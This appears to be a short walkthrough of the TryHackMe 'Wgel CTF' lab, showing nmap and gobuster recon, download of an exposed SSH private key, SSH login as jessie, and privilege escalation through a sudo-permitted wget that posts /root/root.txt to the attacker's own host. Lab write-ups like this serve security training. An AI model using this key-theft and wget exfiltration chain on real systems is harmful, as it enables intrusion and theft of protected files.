----------------                               ------------------
               :::::::::::;| WGEL CTF |;::::::::::::


1) FIRST WE HAVE TO ACCES THE TRYHACKME FROM OPENVPN.
2) WE HAVE TO JOIN THE ROOM "WGEL CTF".
 
TASK - 1 (RECON)

1. SCAN THE MACHNE.

    namp -Pn <ip>

    nmap -A -T 5 <ip> -vv

"it's a Linux machine".

2. How many ports are open?
ANS: 2 ports (22/SSH, 80/HTTP).

3. What's on port 80?
ANS: Apache default page - CHECK /sitemap!

----------TASK 1 COMPLETED----------

TASK - 2 (WEB EXPLOIT)

1. FIND HIDDEN FILES.

    gobuster dir -u http://<ip> -w /usr/share/wordlists/dirb/common.txt
    "FOUND /.ssh/ directory - WTF?"

2. GET SSH KEY.

    http://<ip>/.ssh/id_rsa
    "DOWNLOAD THAT KEY!"

----------TASK 2 COMPLETED-----------
 
TASK - 3 (SSH ACCESS)

1. LOGIN WITH KEY.

    chmod 600 id_rsa
    ssh -i id_rsa jessie@<ip>
    "WE'RE IN AS JESSIE!"

2. FIND USER FLAG.

    find / -name user* 2>/dev/null
    "Flag in /home/jessie/Documents/"

----------TASK 3 COMPLETED-----------

TASK-4 (PRIV ESC)

1. CHECK SUDO.

    sudo -l
    "Can run /usr/bin/wget as root!"
    sudo wget --post-file=/root/root.txt http://<your_ip>
    "ROOT FLAG STOLEN!"

FLAGS:
    Check your Python HTTP server for root flag!
    cat /home/jessie/Documents/user_flag.txt

-------------------                                                --------------------
             -----------                                    ------------
                  ---------- WGEL CTF OWNED ----------
